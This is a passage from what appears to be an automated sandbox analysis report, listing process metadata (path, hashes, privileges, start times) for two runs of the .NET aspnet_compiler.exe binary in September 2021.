                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:21:33:28
                            Start date:14/09/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Imagebase:0x380000
                            File size:55400 bytes
                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:21:33:29
                            Start date:14/09/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Imagebase:0x570000
                            File size:55400 bytes
                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:moderate

                            Disassembly

                            Code Analysis

                            Reset < >